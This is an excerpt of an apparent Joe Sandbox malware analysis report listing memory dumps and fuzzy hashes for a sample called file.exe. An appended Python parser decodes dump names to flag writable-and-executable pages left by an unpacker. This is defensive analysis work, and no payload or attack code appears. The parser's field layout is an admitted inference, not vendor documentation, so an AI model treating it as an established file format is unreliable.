                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9e34a7384b41e523d057ba66d18e7aeaf29953cc1747a95a90b7deccd4daed68
                              • Instruction ID: 50935981c6098b6353e737d32293eeb53682a4d76bc407f1db35e2933b6b501b
                              • Opcode Fuzzy Hash: 9e34a7384b41e523d057ba66d18e7aeaf29953cc1747a95a90b7deccd4daed68
                              • Instruction Fuzzy Hash: F2F0C2F3E083149BF304AD7A9DC472BFA83ABC4710F57413D9B8883741D9B458028295
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7630a3e5b8b0eea4d24d5766765dea590f571f613499956489a45baecb88d0a4
                              • Instruction ID: b076bae69d85dbbc8cd6e065a376276cfbf4d6f4325da2c0697d4c02458fa395
                              • Opcode Fuzzy Hash: 7630a3e5b8b0eea4d24d5766765dea590f571f613499956489a45baecb88d0a4
                              • Instruction Fuzzy Hash: 2FF027706087814FE3188B24E891A3FBBB0EB93614F10142CE3C3D3292EB21D8069B09
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9a570777eae61bb57dd7b482105df4164c573729f7e0c61f556663b5cbed7f2e
                              • Instruction ID: a277197dafb89e12be63151ca022e879536dd39af680dceb10e20e4481b6a5f4
                              • Opcode Fuzzy Hash: 9a570777eae61bb57dd7b482105df4164c573729f7e0c61f556663b5cbed7f2e
                              • Instruction Fuzzy Hash: D4B01250B04608BF11249D0A8C59D7BF7FED2CB740F107008B409A3314C650EC0882FD
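The Memory Dump Source entries above all point at the same thirteen memory dumps of process 1, and the only thing that varies between them is the base address and the page-protection field in the dump identifier. Those identifiers are worth decoding rather than reading by eye: nine of the thirteen regions are image-backed pages at PAGE_EXECUTE_READWRITE (0x40) and two more at PAGE_EXECUTE_WRITECOPY (0x80), which is not how a loader maps a normal PE section and is what one expects after an unpacker rewrites section rights. The following parser is an added example, not Joe Sandbox's own code; the field layout it assumes (pid.stage.sequence.base.protect.field6.memtype.field8.sdmp, with protect and memtype holding winnt.h constants) is inferred from the names on this page rather than taken from vendor documentation, and the sample input is constructed from the identifiers listed in this section.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Page protection constants from winnt.h; they occupy the low byte of the field.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# ASSUMED field layout of a Joe Sandbox .sdmp identifier, inferred from the
# names on this page rather than from vendor documentation:
#   <pid>.<stage>.<sequence>.<base>.<protect>.<field6>.<memtype>.<field8>.sdmp
# field6 and field8 are matched but not interpreted.
_SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<seq>[0-9]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    stage: int
    sequence: int
    base: int
    protect: int
    mem_type: int  # 0x1000000 is MEM_IMAGE in winnt.h

    @property
    def protection_name(self) -> str:
        # Modifier bits such as PAGE_GUARD (0x100) sit above the low byte.
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def writable_and_executable(self) -> bool:
        # W+X pages are where unpacked or self-modifying code ends up.
        low = self.protect & 0xFF
        return bool(low & EXECUTE_MASK) and bool(low & WRITE_MASK)


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one dump identifier. Tolerates the 'Download File' link label
    that HTML-to-text extraction fuses onto the name in exported reports."""
    cleaned = name.strip().removesuffix("Download File").strip()
    m = _SDMP_RE.match(cleaned)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name!r}")
    return DumpRegion(
        pid=int(m["pid"], 16), stage=int(m["stage"], 16), sequence=int(m["seq"]),
        base=int(m["base"], 16), protect=int(m["protect"], 16),
        mem_type=int(m["memtype"], 16),
    )


def protection_summary(names) -> dict:
    """Number of distinct regions per protection name."""
    regions = {parse_sdmp_name(n) for n in names}
    return dict(Counter(r.protection_name for r in regions))


def wx_regions(names) -> list:
    """Sorted base addresses of every distinct writable+executable region."""
    regions = {parse_sdmp_name(n) for n in names}
    return sorted(r.base for r in regions if r.writable_and_executable)


# Constructed input: the thirteen distinct identifiers listed in the Memory Dump
# Source entries of this section, one still carrying the fused link label.
SAMPLE_DUMPS = [
    "00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    print(protection_summary(SAMPLE_DUMPS))
    print([f"{b:#x}" for b in wx_regions(SAMPLE_DUMPS)])
```

Run against the identifiers in this section, protection_summary reports two PAGE_READWRITE regions (the header page at 0x580000 and the one at 0x5D7000), nine PAGE_EXECUTE_READWRITE regions and two PAGE_EXECUTE_WRITECOPY regions, and wx_regions lists eleven writable-and-executable bases starting at 0x581000. Because every region carries the MEM_IMAGE type, these are pages of the mapped file.exe image whose rights were changed after load, so the same check applied to dumps from an unknown sample is a quick way to confirm a section-rights-changing unpacker before opening any of the dumps in a disassembler.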